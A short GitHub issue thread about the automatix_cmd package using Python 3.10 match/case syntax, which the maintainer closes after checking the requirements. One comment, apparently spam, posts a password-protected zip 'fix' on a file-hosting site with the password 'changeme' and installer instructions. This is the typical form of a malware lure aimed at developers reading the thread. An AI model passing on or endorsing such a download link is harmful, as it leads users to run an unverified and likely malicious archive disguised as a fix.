### ISSUE TITLE
Version 2.5.0 uses Python 3.10 features

### ISSUE THREAD

**Issue by ghost** [vanadinit/automatix_cmd#13]
Please rewrite or update requirements.

Match / Case: https://github.com/vanadinit/automatix_cmd/blob/main/automatix/config.py#L235-L252

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vanadinit** [comment]
Just double checked the requirements. Should be all fine. Closing this.
